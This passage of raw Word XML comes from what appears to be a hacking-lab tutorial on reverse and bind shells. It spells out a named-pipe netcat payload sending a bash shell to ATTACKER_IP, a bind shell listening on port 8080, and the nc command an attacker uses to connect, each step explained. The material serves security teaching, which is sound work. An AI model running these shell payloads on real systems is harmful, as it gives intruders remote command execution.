          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATTACKER_IP ATTACKER_PORT &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> - This part pipes the shell's output through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>) to the attacker's IP address (ATTACKER_IP) on the attacker's port (ATTACKER_PORT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E6416" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> -This final part sends the output of the commands back into the named pipe, allowing for bi-directional communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D28E4A" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:t>The payload above can expose the shell bash through the network to the desired listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA96EBF" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker Receives the Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A6244" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:t>Once the above payload is executed, the attacker will receive a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, as shown below, allowing them to execute commands as if they were logging into a regular terminal in the OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33688C1E" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker Terminal Output (Receiving Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B26571" w14:textId="4978EFB8" w:rsidR="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00CB4AF9">
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F91350B" wp14:editId="70D1514D">
            <wp:extent cx="5731510" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49155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55083" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1264920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F7CC2" w14:textId="1F753E7C" w:rsidR="00FE444D" w:rsidRDefault="00D54D58" w:rsidP="00CB4AF9">
      <w:r w:rsidRPr="00D54D58">
        <w:lastRenderedPageBreak/>
        <w:t>The output above shows the connection coming from the IP 10.10.13.37, which is the IP address of the compromised target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2BBADE" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00CB4AF9"/>
    <w:p w14:paraId="4487A8B4" w14:textId="2DCAD5EF" w:rsidR="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D54D58">
        <w:t>Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D0540" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:t>As the name indicates, a bind shell will bind a port on the compromised system and listen for a connection; when this connection occurs, it exposes the shell session so the attacker can execute commands remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCF3F2A" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:t>This method can be used when the compromised target does not allow outgoing connections, but it tends to be less popular since it needs to remain active and listen for connections, which can lead to detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B72312" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:t>How bind shells work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC94A45" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setting Up the Bind Shell on the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E332603" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:t>Let's create a bind shell. In this case, the attacker can use a command like the one below on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B461EFA" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rm -f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/f; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f | bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 0.0.0.0 8080 &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F2726" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation of the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DBDD7" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rm -f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54D58">
        <w:t> - This command removes any existing named pipe file located at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>/f/. This ensures that the script can create a new named pipe without conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD89D33" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54D58">
        <w:t> - This command creates a named pipe, or FIFO, at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>/f. Named pipes allow for two-way communication between processes. In this context, it acts as a conduit for input and output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54137AED" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54D58">
        <w:t> - This command reads data from the named pipe. It waits for input that can be sent through the pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FC84B" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>| bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54D58">
        <w:t> - The output of cat is piped to a shell instance (bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>), which allows the attacker to execute commands interactively. The 2&gt;&amp;1 redirects standard error to standard output, ensuring error messages are returned to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179391D5" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 0.0.0.0 8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54D58">
        <w:t xml:space="preserve"> - Starts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t xml:space="preserve"> in listen mode (-l) on all interfaces (0.0.0.0) and port 8080. The shell will be exposed to the attacker once they connect to this port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E4EC8" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54D58">
        <w:t> This final part sends the commands' output back into the named pipe, allowing for bidirectional communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E30FD30" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:t xml:space="preserve">The command above will listen for incoming connections and expose a bash shell. We need to note that ports below 1024 will require </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54D58">
        <w:t xml:space="preserve"> to be executed with elevated privileges. In this case, using port 8080 will avoid this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DEC8E" w14:textId="77777777" w:rsidR="00D54D58" w:rsidRPr="00D54D58" w:rsidRDefault="00D54D58" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00D54D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal on the Target Machine (Bind Shell Setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4A1580" w14:textId="75F28F25" w:rsidR="00D54D58" w:rsidRDefault="000C51D3" w:rsidP="00D54D58">
      <w:r w:rsidRPr="000C51D3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="756A85AF" wp14:editId="5E941889">
            <wp:extent cx="5731510" cy="486410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="164838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86050" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="486410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94B0AE" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:r w:rsidRPr="00483A30">
        <w:lastRenderedPageBreak/>
        <w:t>Once the command is executed, it will wait for an incoming connection, as shown above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794AC239" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00A40041">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t>Attacker Connects to the Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4409FBB1" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:r w:rsidRPr="00483A30">
        <w:t xml:space="preserve">Now that the target machine is waiting for incoming connections, we can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483A30">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483A30">
        <w:t xml:space="preserve"> again with the following command to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09A039" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483A30">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483A30">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483A30">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483A30">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> TARGET_IP 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62548C43" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00A40041">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t>Explanation of the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095D336" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483A30">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483A30">
        <w:t xml:space="preserve"> - This invokes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483A30">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483A30">
        <w:t>, which establishes the connection to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED49588" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t xml:space="preserve">-n - Disables DNS resolution, allowing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483A30">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483A30">
        <w:t xml:space="preserve"> to operate faster and avoid unnecessary lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C797738" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t>-v - Verbose mode provides detailed output of the connection process, such as when the connection is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF8014" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t>TARGET_IP - The IP address of the target machine where the bind shell is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4145EC" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00483A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t>8080 - The port number on which the bind shell listens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52245396" w14:textId="77777777" w:rsidR="00483A30" w:rsidRPr="00483A30" w:rsidRDefault="00483A30" w:rsidP="00A40041">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00483A30">
        <w:t>Attacker Terminal (After Connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7DFDC5" w14:textId="1D743891" w:rsidR="000C51D3" w:rsidRDefault="00FF1FFE" w:rsidP="00D54D58">
      <w:r w:rsidRPr="00FF1FFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EAADCA2" wp14:editId="4852730B">
            <wp:extent cx="5731510" cy="862965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="171628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89809" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="862965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F71C8A" w14:textId="27DE71F3" w:rsidR="00FF1FFE" w:rsidRDefault="00FF1FFE" w:rsidP="00FF1FFE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF1FFE">
        <w:t>Shell Listeners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A87C418" w14:textId="77777777" w:rsidR="00AD5EFE" w:rsidRPr="00AD5EFE" w:rsidRDefault="00AD5EFE" w:rsidP="00AD5EFE">
      <w:r w:rsidRPr="00AD5EFE">
        <w:t xml:space="preserve">As we learned in previous tasks, a reverse shell will connect from the compromised target to the attacker's machine. A utility like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:t xml:space="preserve"> will handle the connection and allow the attacker to interact with the exposed shell, but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD5EFE">
